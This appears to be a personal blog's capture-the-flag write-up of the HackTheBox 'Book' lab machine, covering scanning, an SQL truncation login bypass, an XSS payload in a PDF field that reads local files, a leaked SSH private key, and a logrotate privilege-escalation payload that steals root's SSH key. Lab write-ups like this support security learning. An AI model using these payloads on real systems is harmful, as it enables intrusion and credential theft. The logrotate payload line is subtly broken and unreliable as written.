HackTheBox Book Writeup – 10.10.10.176

HackTheBox Book Writeup – 10.10.10.176

Hello and welcome back. Today I’m doing a writeup of HackTheBox Book machine (10.10.10.176). The Book is medium difficulty Linux machine released by HackTheBox a couple of weeks ago. The box is based on a number vulnerabilities like, SQL injection, SQL Truncation attack, local file read using XSS, logrotate exploit etc.

Lets begin

NMAP SCAN

As always, I added machine IP 10.10.10.176 to my hots file as book.htb and begin the namp scan. Sinc eits the Linux machine, I decided to go with detailed scan. The nmap scan revealed only two ports are open. The SSH and the TCP 80.

# root @ ns09 in ~/htb/book [9:31:03] 
$ cat book.nmap
# Nmap 7.80 scan initiated Wed Feb 26 09:51:27 2020 as: nmap -T4 -A -sT -oA book book.htb
Nmap scan report for book.htb (10.10.10.176)
Host is up (0.13s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/26%OT=22%CT=1%CU=39553%PV=Y%DS=2%DC=T%G=Y%TM=5E56159
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   124.29 ms 10.10.14.1
2   124.79 ms book.htb (10.10.10.176)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 26 09:52:11 2020 -- 1 IP address (1 host up) scanned in 44.76 seconds

Visiting the webpage, it shows a website of a library with login page and a sign-up page. At this point it looks like

After a little enumeration I found the following directories and files.

Dir found: / - 200
Dir found: /admin/ - 200
File found: /index.php - 200
File found: /admin/index.php - 200
File found: /db.php - 200

I decided to create a user as myself and login.

After logging-in I noticed that the above found files and directories are only accessible to “admin”. So I headed back to sign-up page and registered myself as “Admin”, but the user already exists.

After finding the tips from various HTB forums, I understood that the SQL Truncation attack will work on admin user. I managed to gain the admin privilege and access to admin page doing the below:

Capture the sign-up page using Burp and add the requests as show in the below screenshot. I used spacers and used 11 as end strings as my payload to complete SQL truncation attack. I noticed 302 found response from burp after sending the compiled request. Stopped burp and logged in using admin@book.htb and the password adminadmin I just created and I’m in.

Bypassing Admin credentials – HackTheBox Book Writeup – 10.10.10.176

The Admin is able to upload the PDF from collections page. The posts in HTB forums suggests Admin can upload PHP reverse shell embedded in the PDF file.

A quick Google search led me to this website: https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html “Local File Read via XSS in Dynamically Generated PDF “. Using the attack methods mentioned on the website its possible to access local files using XSS.

The Payload:

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>

The above code I inserted in the author field and uploaded my blank PDF. After calling my PDF from collections menu, the etc/passwd was retrieved.

User.txt

In the same way, I was able to call the RSA key:

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2JJQsccK6fE05OWbVGOuKZdf0FyicoUrrm821nHygmLgWSpJ
G8m6UNZyRGj77eeYGe/7YIQYPATNLSOpQIue3knhDiEsfR99rMg7FRnVCpiHPpJ0
-----------------------------[SNIP]----------------------
nkeaf9obYKsrORVuKKVNFzrWeXcVx+oG3NisSABIprhDfKUSbHzLIR4=
-----END RSA PRIVATE KEY-----

I copied the private key to my .ssh folder and changed the permission. And run the SSH using the user “reader” found in the etc/passwd retrieval and grab the user flag

User.txt HackTheBox Book Writeup – 10.10.10.176

Straight To The Root

After enumerating running processes I noticed the LogRorate is running. The LogRotate is Linux log monitoring application and it is possible to exploit it: https://github.com/whotwagner/logrotten

Based on the above exploit I created a payload to retrieve RSA key from root.

echo "if [ 'id -u' -eq 0 ]; then (echo /root/.ssh/id_rsa >> /key.txt &); fi" > payloadfile

I run the exploit and I got Root private key, I copied it to my Kali and run the SSH as root.

That’s it, thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.